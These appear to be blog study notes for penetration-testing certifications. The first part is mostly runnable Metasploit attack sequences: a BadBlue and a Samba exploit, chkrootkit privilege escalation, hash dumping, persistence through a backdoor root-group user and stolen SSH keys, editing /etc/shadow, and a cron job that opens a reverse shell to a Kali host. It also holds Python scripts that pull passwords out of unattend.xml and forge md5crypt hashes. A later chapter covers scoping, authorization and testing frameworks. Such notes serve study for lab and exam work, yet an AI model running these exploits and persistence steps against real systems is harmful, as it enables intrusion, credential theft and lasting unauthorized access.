> portfwd add -l 1234 -p 80 -r <Victim-2-IP>
> background
> db_nmap -sS -sV -p 1234 localhost
> use exploit/windows/http/badblue_passthru
> set payload windows/meterpreter/bind_tcp
> set RHOSTS <V-2-IP>
> set LPORT 4433
> exploit
> sysinfo

Linux Post Exploitation
Post-Exploitation Modules
> search samba
> use exploit/linux/samba/is_known_pipename
> set RHOSTS <IP>
> exploit
> pwd
> background
> sessions -u 1
> sessions 2
> sysinfo
> getuid
> shell
> /bin/bash -i
> whoami
> uname -r
> uname -a
> ifconfig
> ip a s
> netstat -antp
> ps aux
> env
> terminate
> sessions -u 1
> search enum_configs
> use post/linux/gather/enum_configs
> set SESSION <Meterpreter>
> run
> loot
> search env platform:linux
> use post/multi/gather/env
> set SESSION <id>
> run
> search enum_network
> use post/linux/gather/enum_network
> set SESSION <id>
> run
> search enum_protections
> use post/linux/gather/enum_protections
> set SESSION <id>
> run
> notes
> search enum_system
> use post/linux/gather/enum_system
> set SESSION <id>
> run
> search checkcontainer
> use post/linux/gather/checkcontainer
> set SESSION <id>
> run
> search enum_users_history
> use post/linux/gather/enum_users_history
> set SESSION <id>
> run

Linux Privilege Escalation
> setg RHOSTS <IP>
> search ssh_login
> use auxiliary/scanner/ssh/ssh_login
> set USERNAME jackie
> set PASSWORD password
> exploit
> sessions 1
> pwd
> whoami
> background
> sessions -u 1
> sessions 2
> sysinfo
> getuid
> bash
> ps aux
> cat /bin/check-down
> chkrootkit --help
> chkrootkit -V
> background
> search chkrootkit
> use exploit/unix/local/chkrootkit
> show options
> set CHKROOTKIT /bin/chkrootkit
> set SESSION <mp-id>
> set LHOST eth1
> exploit
> /bin/bash -i

Dumping Hashes with Hashdump
> setg RHOSTS <IP>
> use exploit/linux/samba/is_known_pipename
> exploit
> sessions -u 1
> sessions 2
> sysinfo
> getuid
> background
> search hashdump
> use post/linux/gather/hashdump
> show options
> set SESSION <id>
> run
> loot
> sessions 3
> /bin/bash -i

Establishing Persistence on Linux
> use auxiliary/scanner/ssh/ssh_login
> set USERNAME jackie
> set PASSWORD password
> exploit
> sessions
> sessions -u 1
> sessions 2
> search chkrootkit
> use exploit/unix/local/chkrootkit
> set SESSION <id>
> set CHKROOTKIT /bin/chkrootkit
> set LHOST eth1
> set LPORT <port>
> exploit
> sessions -u 3
> sessions 4
> getuid
> shell
> /bin/bash -i
> useradd -m ftp -s /bin/bash
> passwd ftp // enter: password123
> cat /etc/passwd
> groups root
> usermod -aG root ftp
> groups ftp
> usermod -u 15 ftp
> cat /etc/passwd
> search platform:linux persistence
> use exploit/linux/local/cron_persistence
> set SESSION 4
> set LPORT 4422
> set LHOST eth1
> exploit // fail
> use exploit/linux/local/service_persistence
> set SESSION 4
> set payload cmd/unix/reverse_python
> set LPORT 4422
> exploit // fail
> set target 4
> exploit // fail
> use exploit/linux/local/sshkey_persistence
> set CREATESSHFOLDER true
> set SESSION 4
> exploit
> loot
> cat private_key.txt // use the key from loot
> nano ssh_key // paste the key
> chmod 0400 ssh_key
> ssh -i ssh_key root@<target-ip>

Exploitation
Banner Grabbing
> nmap -sV -O <IP>
> ls -la /usr/share/nmap/scripts | grep banner
> nmap -sV --script=banner <IP>
> nc <IP> <Port>
Nmap Vulnerability Scanning
> nmap -sV -O <IP>
> ls -la /usr/share/nmap/scripts/ | grep http
> nmap -sV --script=http-enum <IP>

Post Exploitation Methodology
Local Enumeration
Transferring Files
Upgrading Shells
Privilege Escalation
Persistence
Dumping & Cracking Hashes
Pivoting
Clearing Tracks

Windows Enum
Users & Groups
> use post/windows/gather/enum_logged_on_users
> set SESSION 1
> run
> shell
> net user administrator
> whoami /priv
> route print
> netstat -ano
> netsh firewall show state
> tasklist /SVC // Enumerate the list of running processes
> show_mount
> use post/windows/gather/win_privs
> set SESSION 1
> run
> use post/windows/gather/enum_applications
> use post/windows/gather/enum_computers
> use post/windows/gather/enum_patches

Linux Enum
> useradd bob -s /bin/bash
> github.com/rebootuser/LinEnum

Windows Priv Escalation
> PrivescCheck
> search web_delivery
> use exploit/multi/script/web_delivery
> set TARGET PSH\ (Binary)
> set payload windows/shell/reverse_tcp
> set PSH-EncodedCommand false
> set LHOST eth1
> exploit
> // copy & paste the generated command into the Windows cmd
> whoami
> background
> use post/multi/manage/shell_to_meterpreter
> set LHOST eth1
> set WIN_TRANSFER VBS
> exploit

Linux Priv Escalation
// Exploiting Permissions
> whoami
> cat /etc/passwd
> find / -not -type l -perm -o+w // /etc/shadow is world-writable here
> cat /etc/shadow
> openssl passwd -1 -salt abc password
> nano /etc/shadow // Remove the * & paste the hash
> su
// Exploiting SUDO Privs
> cat /etc/passwd
> sudo -l
> sudo man cat
> !/bin/bash

Linux Persistence
// Via SSH Keys
> ssh student@<IP> // password: password
> ls -la
> cat wait
> cd .ssh
> cat id_rsa
> cat authorized_keys
> scp student@<IP>:~/.ssh/id_rsa . // copy id_rsa locally
> chmod 400 id_rsa
> ssh student@<IP> // password: password
> rm wait
> ssh -i id_rsa student@<IP>
// Via Cron Jobs
> ssh student@<IP> // password: password
> cat /etc/cron*
> echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<kali-ip>/<port> 0>&1'" > cron
> cat cron
> crontab cron // install the file as the user's crontab
> crontab -l
> rm wait
> nc -nvlp 1234
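The "Unattended Windows Setup" section above pulls a Base64 value out of unattend.xml and decodes it by hand. The code below is an added example (not from the original notes) that walks the file and recovers every password-bearing element. Microsoft's unattend documentation states the encoding rule it applies: when PlainText is false, Value is Base64 of UTF-16LE(password + "AdministratorPassword") for the AdministratorPassword element and UTF-16LE(password + "Password") for AutoLogon and LocalAccount passwords; lab files that hold plain Base64 of the ASCII password (what base64 -d in the notes decodes) are handled as a fallback. The sample XML, account names and passwords are constructed; the UTF-16 detection assumes ASCII-only passwords.

```python
import base64
import xml.etree.ElementTree as ET

SUFFIXES = ("AdministratorPassword", "Password")   # checked longest first
PASSWORD_TAGS = ("AdministratorPassword", "Password")


def _local(tag):
    """Strip the urn:schemas-microsoft-com:unattend namespace from a tag."""
    return tag.split("}")[-1]


def _child(elem, name):
    for c in elem:
        if _local(c.tag) == name:
            return c
    return None


def encode_value(password, suffix="Password"):
    """How Windows stores a non-plaintext password (used here to build the sample)."""
    return base64.b64encode((password + suffix).encode("utf-16-le")).decode()


def decode_value(value, plaintext):
    """Decode one <Value> according to the <PlainText> flag."""
    if plaintext:
        return value
    raw = base64.b64decode(value)
    # UTF-16LE of an ASCII string has a NUL in every odd byte position (assumption: ASCII)
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        text = raw.decode("utf-16-le")
        for suf in SUFFIXES:
            if text.endswith(suf):
                return text[:-len(suf)]
        return text
    return raw.decode("latin-1")                    # lab-style: Base64 of the bare password


def extract_credentials(xml_text):
    """Return [(section, username, password)] for every password element in the file."""
    root = ET.fromstring(xml_text)
    parent = {c: p for p in root.iter() for c in p}   # ElementTree has no parent links
    creds = []
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag not in PASSWORD_TAGS:
            continue
        val = _child(elem, "Value")
        if val is None or not (val.text or "").strip():
            continue
        pt = _child(elem, "PlainText")
        plaintext = pt is not None and (pt.text or "").strip().lower() == "true"
        holder = parent[elem]
        if tag == "AdministratorPassword":
            user = "Administrator"
        else:                                        # AutoLogon uses <Username>, LocalAccount uses <Name>
            name = _child(holder, "Username")
            if name is None:
                name = _child(holder, "Name")
            user = (name.text or "").strip() if name is not None else "?"
        creds.append((_local(holder.tag), user, decode_value(val.text.strip(), plaintext)))
    return creds


# Constructed sample unattend.xml (names and passwords are invented for the demo).
SAMPLE_UNATTEND = """<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password><Value>%s</Value><PlainText>false</PlainText></Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword><Value>%s</Value><PlainText>false</PlainText></AdministratorPassword>
        <LocalAccounts>
          <LocalAccount>
            <Password><Value>Deploy123</Value><PlainText>true</PlainText></Password>
            <Name>svc_deploy</Name>
            <Group>Administrators</Group>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>""" % (encode_value("Winter2024!", "Password"),
                  encode_value("Winter2024!", "AdministratorPassword"))

if __name__ == "__main__":
    for section, user, password in extract_credentials(SAMPLE_UNATTEND):
        print("%-14s %-14s %s" % (section, user, password))
```

Run it against the downloaded file with extract_credentials(open("unattend.xml").read()); the recovered Administrator password is what psexec.py or runas.exe then takes.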

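The "Dumping Linux Password Hashes" prefix table and the `openssl passwd -1 -salt abc password` step in "Linux Priv Escalation" describe the two sides of the same thing: reading a crypt(3) hash and writing one. The code below is an added example (not from the original notes) that classifies /etc/shadow lines (algorithm, hashcat mode, salt, locked or empty password fields) and implements md5crypt so the $1$ hash the notes paste into /etc/shadow can be produced and verified without the openssl binary. The shadow lines in SAMPLE_SHADOW are constructed; only the student line is a real md5crypt hash computed by the code itself.

```python
import hashlib
import hmac

# crypt(3) identifier -> (algorithm, hashcat mode); None = no dedicated hashcat mode
HASH_IDS = {"1": ("md5crypt", 500), "2a": ("bcrypt", 3200), "2b": ("bcrypt", 3200),
            "2y": ("bcrypt", 3200), "5": ("sha256crypt", 7400), "6": ("sha512crypt", 1800),
            "7": ("scrypt", None), "y": ("yescrypt", None)}
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def classify_shadow_line(line):
    """Describe one /etc/shadow line: algorithm, hashcat mode, salt, locked/empty state."""
    user, field = line.split(":")[:2]
    entry = {"user": user, "locked": False, "no_password": False,
             "algorithm": None, "hashcat_mode": None, "salt": None}
    if field == "":
        entry["no_password"] = True          # passwordless: anyone can su to it
        return entry
    if field.startswith(("!", "*")):
        entry["locked"] = True
        field = field.lstrip("!")            # "!$6$..." is a locked account with a real hash
        if not field.startswith("$"):
            return entry                     # bare "*" or "!": nothing to crack
    parts = field.split("$")                 # '', id, params/salt..., hash
    ident = parts[1] if len(parts) > 2 else None
    params = parts[2:]
    algo, mode = HASH_IDS.get(ident, ("unknown", None))
    if ident in ("2a", "2b", "2y"):          # $2y$cost$<22-char salt><31-char hash>
        salt = params[1][:22] if len(params) > 1 else None
    elif ident in ("y", "7"):                # $y$params$salt$hash
        salt = params[1] if len(params) > 1 else None
    else:                                    # $N$[rounds=R$]salt$hash
        if params and params[0].startswith("rounds="):
            params = params[1:]
        salt = params[0] if params else None
    entry.update(algorithm=algo, hashcat_mode=mode, salt=salt)
    return entry


def _to64(value, n):
    out = ""
    for _ in range(n):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5crypt(password, salt):
    """FreeBSD md5crypt, the $1$ scheme that `openssl passwd -1 -salt abc password` emits."""
    pw, salt = password.encode(), salt.encode()[:8]      # at most 8 salt characters are used
    ctx = hashlib.md5(pw + b"$1$" + salt)
    alt = hashlib.md5(pw + salt + pw).digest()
    n = len(pw)
    while n > 0:                                          # mix in alt, 16 bytes per pw length
        ctx.update(alt[:min(n, 16)])
        n -= 16
    n = len(pw)
    while n:                                              # one byte per bit of len(pw)
        ctx.update(b"\x00" if n & 1 else pw[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):                                 # stretching rounds
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(salt)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    f = final
    encoded = (_to64((f[0] << 16) | (f[6] << 8) | f[12], 4)
               + _to64((f[1] << 16) | (f[7] << 8) | f[13], 4)
               + _to64((f[2] << 16) | (f[8] << 8) | f[14], 4)
               + _to64((f[3] << 16) | (f[9] << 8) | f[15], 4)
               + _to64((f[4] << 16) | (f[10] << 8) | f[5], 4)
               + _to64(f[11], 2))
    return "$1$" + salt.decode() + "$" + encoded


def verify_md5crypt(password, hashed):
    """Recompute with the hash's own salt and compare in constant time."""
    return hmac.compare_digest(md5crypt(password, hashed.split("$")[2]), hashed)


def build_shadow_line(user, hashed, last_change=19600):
    """The line the notes paste into /etc/shadow in place of the '*' field."""
    return "%s:%s:%d:0:99999:7:::" % (user, hashed, last_change)


# Constructed sample: root/deploy/bob hashes are illustrative strings, the student line is real.
SAMPLE_SHADOW = "\n".join([
    "root:$6$rounds=5000$Ke02nYgg.9kXbjXs$0Jt2KNZ7P7G0lvhQ9W4Fz4nSKgH5G1lgJSqFvW2aHFe8kf2ZKQo2JfJd1H.RLwTtYaA0QAO8QOojlgZN1r3Lp.:19600:0:99999:7:::",
    build_shadow_line("student", md5crypt("password", "abc")),
    "deploy:$y$j9T$F5Jx5fExrKuPp53xLKwKe1$X3DX6M94c7o.9agCG9G317fhZg9SqmRh6YhBX6HTUXB:19600:0:99999:7:::",
    "bob:$2y$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy:19600:0:99999:7:::",
    "daemon:*:19600:0:99999:7:::",
    "sshd:!:19600::::::",
    "guest::19600:0:99999:7:::",
])

if __name__ == "__main__":
    for line in SAMPLE_SHADOW.splitlines():
        print(classify_shadow_line(line))
```

The hashcat mode is what you hand to `hashcat -m` after hashdump; $y$ (yescrypt, the default on current Debian/Ubuntu) has no dedicated hashcat mode and is normally cracked with John.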
October 28, 2024 · 25 min · Dhanraj Chavan

Intro to EJPT

Intro
48 Hour Exam
35 Questions
Links
https://medium.com/@ls5747670/my-ejptv2-experience-and-tips-2024-a91954726fc5
https://infosecwriteups.com/mastering-the-ejptv2-exam-ec38daec16bc
https://aluvi.notion.site/eJPTv2-Complete-Cheat-sheet-d5b052c525d94c89b5d41183bd5c39fd
https://cisofy.com/lynis/
https://github.com/xonoxitron/INE-eJPT-Certification-Exam-Notes-Cheat-Sheet
https://github.com/Nater-aide/EJPT/blob/main/Notes/Wordpress.md
https://github.com/miazga-git/eJPT-Study-Notes
https://github.com/syselement/ine-notes/blob/main/ejpt/ejpt-cheatsheet.md
https://github.com/Nater-aide/EJPT/blob/main/Notes/MYSQL.mdk

October 28, 2024 · 1 min · Dhanraj Chavan

Chapter 1: Engagement Management

Chapter 1
Objective 1.1
Scope Definition
Regulations, Frameworks, and Standards
Privacy: Ensure compliance with privacy laws (e.g., GDPR, HIPAA).
Security: Adhere to security standards (e.g., ISO/IEC 27001, NIST).
Rules of Engagement
Exclusions: Define what systems, networks, or data are off-limits. Example: Exclude the production environment to avoid disruptions.
Test Cases: Specify the scenarios and conditions under which the testing will occur. Example: Testing for SQL injection vulnerabilities in the login module.
Escalation Process: Establish a protocol for addressing critical issues discovered during testing. Example: Immediate notification to the security team if a critical vulnerability is found.
Testing Window: Determine the timeframe for when testing will occur. Example: Conduct tests during off-peak hours to minimize business impact.
Key Points:
The timeline for the engagement and when testing can be conducted.
What locations, systems, applications, or other potential targets are in scope.
Types of tests that are allowed or disallowed.
Data handling requirements for information gathered during the penetration test.
What behaviors to expect from the target.
What resources are committed to the test.
Legal concerns.
When and how communications will occur.
Who to contact in case of particular events.
Who is permitted to engage the pentest team.
Agreement Types
Non-Disclosure Agreement (NDA) → Legal documents that help enforce confidential relationships between two parties. NDAs protect one or more parties in the relationship and typically outline the parties, what information should be considered confidential, how long the agreement lasts, when and how disclosure is acceptable, and how confidential information should be handled.
Master Service Agreement (MSA) → Defines the terms that the organizations will use for future work.
This makes ongoing engagements and SOWs much easier to work through, as the overall MSA is referred to in the SOW, preventing the need to renegotiate terms. MSAs are common when organizations anticipate working together over a period of time or when a support contract is created.
Statement of Work (SoW) → A document that defines the purpose of the work, what work will be done, what deliverables will be created, the timeline for the work to be completed, the price for the work, and any additional terms and conditions that cover the work. Alternatives to statements of work include statements of objectives (SOOs) and performance work statements (PWSs), both of which are used by the U.S. government.
Terms of Service (ToS) → Defines the rules that users must agree to abide by to use a service. Ex. Conditions under which the penetration testing services will be rendered, including acceptable use policies.
Target Selection
Classless Inter-Domain Routing (CIDR) Ranges → Defines a range of IP addresses for network targeting. Example: The CIDR range 192.168.1.0/24 includes all IP addresses from 192.168.1.0 to 192.168.1.255.
Domains → Specifies domain names to be tested. Example: Testing example.com and its subdomains (sub.example.com).
Internet Protocol (IP) Addresses → Individual IP addresses selected for penetration testing. Example: Testing specific servers at 192.168.1.10 and 192.168.1.20.
Uniform Resource Locator (URL) → Specific web addresses within domains targeted for testing. Example: Testing the URL http://example.com/login for vulnerabilities.
Assessment Types
Web → Focuses on identifying vulnerabilities in web applications and websites. Example: Testing for cross-site scripting (XSS) and SQL injection. Comparison: Web assessments often involve different tools and techniques than network assessments due to the nature of web technologies.
Network → Examines network infrastructure, including routers, switches, and firewalls, for security weaknesses.
Example: Scanning for open ports, weak configurations, and vulnerabilities in network devices. Comparison: Network assessments are more focused on connectivity and data flow between systems, unlike web or mobile assessments.
Mobile → Targets vulnerabilities in mobile applications and devices. Example: Testing for insecure data storage, insufficient encryption, and insecure communication in a mobile app. Comparison: Mobile assessments require different skill sets and tools compared to web and network assessments due to the unique operating systems and application environments.
Cloud → Assesses security of cloud-based infrastructure, platforms, and services. Example: Evaluating the security of AWS, Azure, or Google Cloud configurations. Comparison: Cloud assessments involve understanding cloud-specific security practices and compliance requirements, different from on-premises assessments.
Application Programming Interface (API) → Examines the security of APIs, which facilitate communication between different software components. Example: Testing for insecure authentication, authorization, and input validation in APIs. Comparison: API assessments are specialized and focus on data exchange mechanisms, unlike general application assessments.
Application → Broad category encompassing the assessment of software applications, including desktop and enterprise applications. Example: Testing for buffer overflows, improper error handling, and insecure code practices. Comparison: Application assessments are broader and can include aspects of web, mobile, and API assessments.
Wireless → Focuses on the security of wireless networks, including Wi-Fi and Bluetooth. Example: Testing for weak encryption protocols (e.g., WEP), unauthorized access points, and insecure wireless configurations. Comparison: Wireless assessments require specific tools and techniques, such as Wi-Fi sniffers and signal analyzers, differing from wired network assessments.
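The Target Selection and Exclusions items above describe scope as CIDR ranges, IPs, domains and URLs, with some targets carved out. The code below is an added example (not from the chapter) of a scope gate that turns those definitions into a check a tester runs before pointing a scanner at anything. The scope values in the test reuse the chapter's own examples (192.168.1.0/24, example.com, http://example.com/login); the exclusion of 192.168.1.20 is invented for the demo.

```python
import ipaddress
from urllib.parse import urlsplit


class Scope:
    """Authorized networks/IPs and domains, minus explicit exclusions."""

    def __init__(self, networks=(), domains=(), excluded=()):
        # strict=False accepts host addresses like 192.168.1.20 as /32 networks
        self.networks = [ipaddress.ip_network(n, strict=False) for n in networks]
        self.excluded = [ipaddress.ip_network(n, strict=False) for n in excluded]
        self.domains = [d.lower().strip(".") for d in domains]

    def ip_in_scope(self, ip):
        addr = ipaddress.ip_address(ip)            # raises ValueError for hostnames
        if any(addr in net for net in self.excluded):
            return False                           # exclusions win over inclusions
        return any(addr in net for net in self.networks)

    def host_in_scope(self, host):
        host = host.lower().rstrip(".")
        return any(host == d or host.endswith("." + d) for d in self.domains)

    def check(self, target):
        """Accept an IP, a hostname or a URL and say whether it may be tested."""
        if "://" in target:
            target = urlsplit(target).hostname or ""
        try:
            return self.ip_in_scope(target)
        except ValueError:
            return self.host_in_scope(target)


def filter_targets(scope, targets):
    """Keep only in-scope entries from a candidate list (e.g. before feeding nmap)."""
    return [t for t in targets if scope.check(t)]


if __name__ == "__main__":
    scope = Scope(networks=["192.168.1.0/24"], domains=["example.com"], excluded=["192.168.1.20"])
    for t in ["192.168.1.10", "192.168.1.20", "10.0.0.1", "api.example.com", "http://example.com/login"]:
        print("%-26s %s" % (t, "IN SCOPE" if scope.check(t) else "out of scope"))
```

Pipe the output of filter_targets() into the scanner rather than the raw list; an excluded production host then never appears in the target file at all.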
Shared Responsibility Model
Hosting Provider Responsibilities
Infrastructure Security: Ensuring the physical and foundational security of servers, storage, and networking components. Example: Data center security, hardware maintenance, and network security (e.g., DDoS protection).
Compliance: Adhering to regulatory and industry standards. Example: Compliance with SOC 2, ISO 27001, or PCI-DSS for data protection and privacy.
Customer Responsibilities
Data Security: Protecting data within the cloud environment, including encryption and access controls. Example: Encrypting sensitive data stored in cloud databases.
Configuration Management: Properly configuring cloud services and resources. Example: Setting up secure configurations for virtual machines and storage buckets to prevent unauthorized access.
User Access Management: Managing user identities and access to resources. Example: Implementing multi-factor authentication (MFA) and least privilege access controls.
Penetration Tester Responsibilities
Testing Authorization: Obtaining necessary permissions to conduct penetration testing. Example: Securing formal approval from both the customer and hosting provider before initiating tests.
Scope Adherence: Testing within the agreed-upon scope and respecting rules of engagement. Example: Only testing authorized systems and avoiding any non-approved systems or data.
Vulnerability Reporting: Providing detailed reports on discovered vulnerabilities and recommendations for remediation. Example: Creating comprehensive reports with clear, actionable recommendations for improving security.
Third-Party Responsibilities
Service Integration Security: Ensuring the security of third-party services integrated into the customer's environment. Example: Securely integrating third-party payment processors or authentication services.
Compliance and Audits: Adhering to relevant compliance requirements and undergoing regular security audits.
Example: Ensuring third-party vendors comply with GDPR or HIPAA regulations as required.
Incident Response: Collaborating in incident response activities when security breaches involve third-party services. Example: Coordinating with third-party providers to quickly address and mitigate breaches.
Legal and Ethical Considerations
Authorization Letters
Purpose: Formal documents granting permission to conduct penetration testing. Example: A written authorization from a company's senior management allowing a pentester to test specific systems.
Importance: Protects both the client and the tester legally, ensuring all parties are aware of the testing activities.
Content: Should include scope, timeframe, and any limitations of the test. Example: An authorization letter specifying the systems to be tested, the methods to be used, and the duration of the testing period.
Mandatory Reporting Requirements
Legal Obligation: Certain vulnerabilities or breaches must be reported to relevant authorities or stakeholders. Example: Reporting discovered vulnerabilities to the organization's security team and, if applicable, to regulatory bodies.
Compliance: Adhering to industry standards and regulations that mandate reporting. Example: GDPR requires notifying authorities within 72 hours of becoming aware of a data breach.
Ethical Responsibility: Ensuring transparency and accountability by reporting findings that could impact stakeholders. Example: Reporting a critical vulnerability in a financial system that could lead to significant data loss or theft.
Risk to the Penetration Tester
Legal Risks: Potential legal consequences if testing is done without proper authorization. Example: Facing charges of unauthorized access or data tampering if tests are conducted without explicit permission.
Physical Risks: Possible dangers when testing physical security controls or on-site systems. Example: Risk of injury when physically accessing and testing the security of data centers or other secure facilities.
Professional Risks: Reputation and career implications if testing is conducted unethically or results are mishandled. Example: Loss of credibility or job if a tester fails to disclose a significant vulnerability or mishandles sensitive information.
Objective 1.2
Peer Review
Purpose: Ensures accuracy and thoroughness of the penetration testing results through review by fellow security professionals. Example: A pentester's report is reviewed by another team member for completeness and accuracy.
Stakeholder Alignment
Purpose: Ensures all relevant parties are informed and in agreement with the objectives and scope of the penetration test. Example: Regular meetings with IT, security teams, and management to align on testing goals and expectations.
Importance: Facilitates a unified approach and understanding among stakeholders.
Outcome: Cohesive and coordinated efforts towards improving security.
Root Cause Analysis
Purpose: Identifies the underlying reasons for discovered vulnerabilities or security issues. Example: Analyzing why a SQL injection vulnerability existed in an application's code.
Importance: Helps prevent recurrence by addressing the fundamental issues rather than just symptoms.
Outcome: Implementation of long-term fixes and improvements in security practices.
Escalation Path
Purpose: Defines a clear process for escalating critical issues discovered during testing. Example: Immediate notification to senior management if a critical vulnerability is found.
Importance: Ensures swift action and decision-making to address serious risks.
Outcome: Timely and effective mitigation of critical vulnerabilities.
Secure Distribution
Purpose: Ensures sensitive findings and reports are shared securely with authorized personnel only. Example: Using encrypted emails or secure portals to share test results.
Importance: Protects sensitive information from unauthorized access and potential misuse.
Outcome: Maintains confidentiality and integrity of the findings.
Articulation of Risk, Severity, and Impact
Purpose: Clearly communicates the risks, severity, and potential impact of identified vulnerabilities. Example: Explaining the potential business impact of a critical vulnerability in layman's terms to non-technical stakeholders.
Importance: Helps stakeholders understand the urgency and significance of the findings.
Outcome: Informed decision-making regarding remediation priorities and resource allocation.
Goal Reprioritization
Purpose: Adjusts testing and remediation goals based on new findings and evolving business needs. Example: Shifting focus to newly discovered critical vulnerabilities that pose immediate risks.
Importance: Ensures resources are effectively utilized to address the most pressing security issues.
Outcome: Dynamic and responsive approach to penetration testing and remediation.
Business Impact Analysis
Purpose: Assesses the potential impact of vulnerabilities on business operations. Example: Evaluating how a vulnerability could affect customer data and business continuity.
Importance: Provides context for understanding the real-world implications of security issues.
Outcome: Prioritized remediation efforts based on business risk.
Client Acceptance
Purpose: Obtains formal approval from the client for the findings, recommendations, and remediation plan. Example: Presenting the final report to the client and gaining their agreement on the next steps.
Importance: Ensures client buy-in and commitment to implementing recommended security measures.
Outcome: Successful collaboration and alignment on security improvements.
Objective 1.3
Open Source Security Testing Methodology Manual (OSSTMM)
Purpose: Provides a comprehensive methodology for security testing and analysis. A broad penetration testing methodology guide with information about analysis, metrics, workflows, human security, physical security, and wireless security.
- Caveat: The current edition (OSSTMM 3) dates from 2010 and has not been updated since, so more modern techniques and technologies are not covered.

**Council of Registered Ethical Security Testers (CREST)**
- Purpose: Offers accreditation and certification for organizations and individuals in the security testing industry.
- Key Features: Sets professional standards for security testing and provides guidelines and certifications.

**Penetration Testing Execution Standard (PTES)**
- Purpose: Provides a detailed framework for performing penetration testing.
- Key Features: Covers seven phases: Pre-engagement Interactions, Intelligence Gathering, Threat Modeling, Vulnerability Analysis, Exploitation, Post-Exploitation, and Reporting.
- It ranges from pre-engagement interactions (scoping, questions to ask clients) to details such as how to deal with third parties, and its technical guidelines cover a full range of penetration testing techniques and concepts, making it one of the most complete and modern openly available penetration testing standards.

**MITRE ATT&CK** → Notes

**OWASP Top 10**
- Purpose: Lists the ten most critical web application security risks.
- Key Features: Focuses on prevalent and severe web application weaknesses such as injection (including SQL injection), cross-site scripting (XSS), broken access control, and more.

**OWASP Mobile Application Security Verification Standard (MASVS)**
- Purpose: Provides a framework for securing mobile applications.
- Key Features: Defines security requirements and verification levels for mobile app security.

**Purdue Model**
- Purpose: A reference model for industrial control systems (ICS) security.
- Key Features: Divides ICS networks into levels, each with specific security considerations.
- The Purdue Model, also known as the Purdue Enterprise Reference Architecture (PERA), is a widely accepted framework for segmenting and securing ICS environments. It organizes the architecture into layers, each with specific roles and security requirements.
This model helps in understanding how to secure and manage the different components of an ICS network.

**Layers of the Purdue Model**
- Level 0: Physical Process. The physical processes and machinery themselves: sensors, actuators, and other devices that interact directly with the physical environment. Examples: sensors measuring temperature, pressure, or flow rates; actuators controlling valves, motors, or pumps.
- Level 1: Basic Control. The control devices that directly manage Level 0 equipment, typically programmable logic controllers (PLCs) and remote terminal units (RTUs). Examples: PLCs and RTUs executing control logic to automate processes; human-machine interfaces (HMIs) at the local control level.
- Level 2: Supervisory Control. Systems that provide supervisory control and data acquisition (SCADA) functions, aggregating data from Level 1 and providing oversight and control. Examples: SCADA servers for real-time monitoring and control; HMIs at the supervisory level.
- Level 3: Operations Management. Site-wide systems for production control, including batch management, production scheduling, and other operational functions. Examples: manufacturing execution systems (MES) managing production workflows; systems for coordinating production processes and quality control.
- Level 4: Enterprise Systems. Business logistics, planning, and enterprise resource management. Examples: enterprise resource planning (ERP) and customer relationship management (CRM) systems.
- Level 5: External Networks. Connections to external networks, including business partners, suppliers, and the internet. Examples: connections to the corporate network; external cloud services.

A boundary worth knowing for testing: an industrial DMZ (often labelled Level 3.5) sits between Levels 3 and 4 so that no connection passes directly between the enterprise network and the control network. Whether that segmentation actually holds is one of the first things to check when an engagement touches OT.

**Threat Modeling Frameworks**

**DREAD (Damage potential, Reproducibility, Exploitability, Affected users, Discoverability)**
- Purpose: Provides a quantitative assessment of threat severity.
- Components:
  - Damage Potential: Measures the potential impact of a threat. Example: a vulnerability that allows full system takeover scores high.
  - Reproducibility: Assesses how easily the threat can be reproduced. Example: a threat that can be reproduced consistently scores high.
  - Exploitability: Evaluates how easy it is to exploit the threat. Example: a threat that requires minimal technical skill to exploit scores high.
  - Affected Users: Estimates the number of users impacted by the threat. Example: a vulnerability affecting all users of an application scores high.
  - Discoverability: Measures how likely the threat is to be discovered. Example: a vulnerability visible in public-facing code scores high.
- Usage: Helps prioritize threats by an overall risk score: each component is rated on the same scale (1 to 10 in Microsoft's original formulation) and the five ratings are averaged.

**STRIDE (Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, Elevation of privilege)**
- Purpose: Identifies potential threats by categorizing them into six types.
- Components:
  - Spoofing: Impersonation of a user or device. Example: unauthorized access using stolen credentials.
  - Tampering: Unauthorized alteration of data. Example: modifying transaction details in a database.
  - Repudiation: Denying an action or transaction when there is no proof it occurred. Example: a user denying having submitted a malicious request because no audit log ties the request to them.
  - Information Disclosure: Unauthorized exposure of information. Example: data leakage through unencrypted channels.
  - Denial of Service (DoS): Disruption of service availability. Example: overloading a server to prevent legitimate access.
  - Elevation of Privilege: Gaining unauthorized higher-level access. Example: exploiting a vulnerability to gain admin rights.
- Usage: Provides a structured approach to identifying and categorizing threats during system design and analysis. Each category is the violation of one security property (authentication, integrity, non-repudiation, confidentiality, availability, authorization), which makes STRIDE a convenient checklist for spotting missing controls.

**OCTAVE (Operationally Critical Threat, Asset, and Vulnerability Evaluation)**
- Purpose: Focuses on organizational risk management and strategic assessment.
- Components:
  - Identifying Critical Assets: Recognize and prioritize key organizational assets. Example: identifying customer data and intellectual property as critical assets.
  - Threat Profiling: Determine the potential threats to each critical asset. Example: profiling threats such as cyber-attacks, insider threats, and natural disasters.
  - Vulnerability Assessment: Identify vulnerabilities that those threats could exploit. Example: assessing systems for software bugs, misconfigurations, and weak access controls.
  - Risk Mitigation Planning: Develop strategies to mitigate the identified risks. Example: implementing security controls and response plans for the identified vulnerabilities.
- Usage: Provides a comprehensive approach for assessing and managing risk at the organizational level.

### Objective 1.4

**Format Alignment**
- Purpose: Ensures consistency and clarity in report presentation.
- Example: Using a standard template with predefined sections, headings, and formatting styles.
